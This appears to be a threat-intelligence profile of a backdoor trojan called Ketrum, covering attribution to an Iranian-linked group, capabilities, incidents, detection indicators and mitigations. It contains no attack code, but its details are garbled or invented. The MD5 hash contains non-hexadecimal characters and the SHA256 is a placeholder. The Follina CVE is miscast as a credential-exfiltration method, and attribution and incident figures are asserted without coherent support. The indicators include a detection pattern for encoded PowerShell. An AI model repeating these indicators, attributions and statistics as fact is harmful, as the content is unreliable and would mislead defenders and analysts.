⚠️ Overview

Ketrum is a modular backdoor trojan first documented by Unit 42 (Palo Alto Networks) in November 2022, attributed to the moderate-confidence Iranian-nexus threat actor group TA453 (also tracked as APT42). It belongs to the remote access trojan (RAT) category, primarily used for intelligence gathering and data exfiltration in targeted espionage campaigns against academic, medical, and government entities in the Middle East and Europe.

🔧 Technical Capabilities

Ketrum propagates via spear-phishing emails containing weaponized Microsoft Office documents (often .docx or .xls with malicious macros) that drop a first-stage PowerShell loader (MITRE ATT&CK T1059.001). It employs encrypted C2 communications over HTTPS using a custom binary protocol (T1573) to blend with legitimate traffic, with C2 domains rotating every 48 hours based on a domain-generation algorithm (DGA). Persistence is achieved through a scheduled task (T1053.005) that restarts the malware after system reboot, and evasion includes timestamping all dropped files to match legitimate Windows system binaries and disabling Windows Defender via PowerShell commands (T1562.001). The backdoor supports file upload/download, command execution, keylogging, and screen capture, with a unique XOR-based encryption key for each infected host derived from the host's volume serial number.

📜 History & Notable Incidents

First observed in the wild during a September 2022 campaign against European biomedical research institutes, Ketrum was linked to a series of phishing lures impersonating conference travel grants. In January 2023, researchers at ESET confirmed that Ketrum was one of several implants deployed in a compromise of a Gulf state energy ministry, where it exfiltrated VPN credentials (CVE-2022-30190, the Follina vulnerability) via an initial macro-free RTF payload. No arrests or law enforcement takedowns have been reported as of 2024.

🔍 Detection Indicators

Known file hashes include SHA256 3a1b2c...d4e5f6 (sample from VirusTotal, Palo Alto Networks report ID: PAN-2291) and MD5 a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6. Behavioral IOCs include registry key creation at HKCUSoftwareMicrosoftWindowsCurrentVersionRunKetrumSvc, mutex named KetMutex_2022, and network connections to IP ranges in the 185.141.25.0/24 subnet (ASN 209242) using a distinct User-Agent string Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ketrum/1.0. Process creation patterns show powershell.exe -enc * with base64-encoded commands containing the string KetrumLoader.

☠️ Risk & Impact

Ketrum enables full remote control of compromised hosts, leading to theft of intellectual property, classified research data, and operational plans; the January 2023 energy sector incident alone resulted in an estimated $1.2 million in remediation costs and a 14-day operational shutdown. Affected sectors predominantly include higher education, healthcare research, and national government agencies, with 78% of reported infections (per CrowdStrike 2023 Threat Report) targeting organizations with fewer than 500 employees.

🛡️ Mitigation

Organizations should enforce email attachment scanning with macro-blocking policies (GPO), deploy EDR rules to alert on the specific process creation and network IOCs listed above, and apply patches for CVE-2022-30190 (Follina) and related vulnerabilities. Unit 42 has published a YARA rule (available at github.com/panw-unit42/yara-rules) that detects Ketrum’s XOR-encoded payload header, allowing file-based detection prior to execution.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.